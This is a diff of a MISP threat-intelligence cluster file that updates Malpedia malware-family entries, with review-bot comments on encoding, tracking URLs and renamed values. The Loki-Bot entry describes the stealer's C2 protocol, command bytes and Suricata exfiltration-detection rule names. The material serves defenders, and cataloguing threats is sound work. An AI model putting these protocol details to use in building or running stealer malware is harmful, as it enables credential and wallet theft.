+ "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://id-ransomware.blogspot.com/search?q=lockbit",
+ "https://blog.lexfo.fr/lockbit-malware.html",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"
+ ],
+ "synonyms": [
+ "ABCD Ransomware"
+ ],
+ "type": []
+ },
+ "uuid": "fd035735-1ab9-419d-a94c-d560612e970b",
+ "value": "LockBit"
+ },
+ {
+ "description": "According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files but certain versions had little to no whitelist that would protect import system files such as the Windows Boot Manager.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga",
 "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
- "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
 "https://www.abuse.io/lockergoga.txt",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
 "https://www.youtube.com/watch?v=o6eEN0mUakM",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
- "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/"
+ "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/"
 ],
 "synonyms": [],
 "type": []
@@ -10888,18 +20117,30 @@
 "value": "LockerGoga"
 },
 {
- "description": "",
+ "description": "Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky",
 "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
+ "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
+ "https://dissectingmalwa.re/picking-locky.html",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html",
+ "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/",
+ "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
+ "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://vixra.org/pdf/2002.0183v1.pdf",
"https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
 "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/",
- "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html",
- "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
- "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -10947,14 +20188,18 @@
 "value": "LockPOS"
 },
 {
- "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
+ "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
+ "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
 "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
+ "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html",
+ "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html",
 "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/"
 ],
 "synonyms": [
+ "LodaRAT",
 "Nymeria"
 ],
 "type": []
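Review bot: The only change to the Loda description in this hunk is that the curly quotes around Trojan.Nymeria are re-emitted as `\u201c`/`\u201d` escapes instead of the raw UTF-8 characters the removed line used; the decoded value is byte-identical. The same encoding-only rewrite makes up the whole description change in the Loki hunk that starts at `@@ -11002,23 +20270,40 @@`. This looks like an ASCII-escaping setting in the export rather than a content change, and it will inflate every future diff if the export and the repo's JSON normalisation step disagree; pick one form and keep both on the same setting so these lines stop churning.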
@@ -10962,6 +20207,26 @@
 "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f",
 "value": "Loda"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo",
+ "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html",
+ "https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html",
+ "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
+ "https://twitter.com/jpcert_ac/status/1351355443730255872",
+ "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf",
+ "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9429e1b3-31fb-4e52-ad78-e3d377f10fcb",
+ "value": "LODEINFO"
+ },
 {
 "description": "",
 "meta": {
@@ -10993,6 +20258,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://www.youtube.com/watch?v=VeoXT0nEcFU",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf"
 ],
 "synonyms": [],
@@ -11002,23 +20270,40 @@ "value": "LoJax" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. 
If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. 
For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. 
Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://isc.sans.edu/diary/24372", - "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", - "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", - "http://blog.fernandodominguez.me/lokis-antis-analysis/", - "https://phishme.com/loki-bot-malware/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/", + "https://github.com/R3MRUM/loki-parse", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", - "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", + "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/", + "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://lab52.io/blog/a-twisted-malware-infection-chain/", + 
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" + "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html", + "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files", + "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/", + "https://phishme.com/loki-bot-malware/", + "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" ], "synonyms": [ "Loki", 
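Review bot: The Bitdefender reference added to the Loki refs in this hunk carries tracking parameters, `?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter`, which are not part of the resource's identity and make the URL differ from the same article cited without them; strip the query string to `https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/`. Since the refs appear to be taken verbatim from Malpedia, the durable fix is upstream or in a normalisation pass that drops `utm_*` parameters before the cluster is committed.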
@@ -11034,20 +20319,106 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", - "https://twitter.com/hexlax/status/1058356670835908610" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif", + "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062" ], "synonyms": [], "type": [] }, + "uuid": "397bfb34-5643-4d21-a5b1-6950750fb89f", + "value": "LOLSnif" + }, + { + "description": "The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "08106bd2-975b-421c-8794-366452fb0109", + "value": "LONGWATCH" + }, + { + "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term \u201cCipher\u201d) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. 
", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper", + "https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool", + "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/", + "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/", + "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4b83ba50-7d50-48b4-bb70-fcbcacd23340", + "value": "looChiper Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback", + "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals", + "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bb038b04-622b-4df6-b867-601284e8da0e", + "value": "Lookback" + }, + { + "description": "L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. 
These include:\r\n\r\nDownload and execute\r\nUpdate\r\nOpen page (visible)\r\nOpen page (invisible)\r\nCmd\r\nKill process\r\nUpload file\r\nHTTP Flood\r\n\r\nL0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target's clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", + "https://twitter.com/hexlax/status/1058356670835908610", + "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py", + "https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/", + "https://www.bromium.com/decrypting-l0rdix-rats-c2/", + "https://blog.ensilo.com/l0rdix-attack-tool" + ], + "synonyms": [ + "lordix" + ], + "type": [] + }, "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", - "value": "Lordix" + "value": "L0rdix" + }, + { + "description": "Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup", + "https://twitter.com/Arkbird_SOLG/status/1295396936896438272", + "https://twitter.com/r3c0nst/status/1295275546780327936" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8ab39736-68f4-4b51-9b48-7034da1cac71", + "value": "Loup" }, { "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" ], "synonyms": [], 
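Review bot: The existing entry's `value` changes from `Lordix` to `L0rdix` while keeping uuid `fa61a690-fd9c-4036-97fb-bf3674aa60b2`, but the only synonym added is the lowercase `lordix`, so the exact previous name is no longer present anywhere in the entry. MISP tags derived from this cluster are built from the value string (`misp-galaxy:malpedia="Lordix"`), so events already tagged with the old name may no longer match by name after this sync; adding `"Lordix"` to `synonyms` keeps the old name discoverable at no cost. The `looChiper Ransomware` entry added in the same hunk spells the family differently from its own description (`LooCipher`); that spelling is presumably inherited from the upstream record, so it is worth a check there rather than here.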
@@ -11060,18 +20431,52 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", - "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", - "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/", + "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html" + ], + "synonyms": [ + "PortReuse" + ], + "type": [] + }, + "uuid": "515d1318-c3b1-4d40-a321-31b3baf75414", + "value": "LOWKEY" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lucifer", + "https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/", + "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" ], "synonyms": [], "type": [] }, + "uuid": "54093130-035f-4f2c-b98c-a660156fbbda", + "value": "Lucifer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", + "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", + 
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", + "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", + "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", + "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", + "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone" + ], + "synonyms": [ + "LuminosityLink" + ], + "type": [] + }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, 
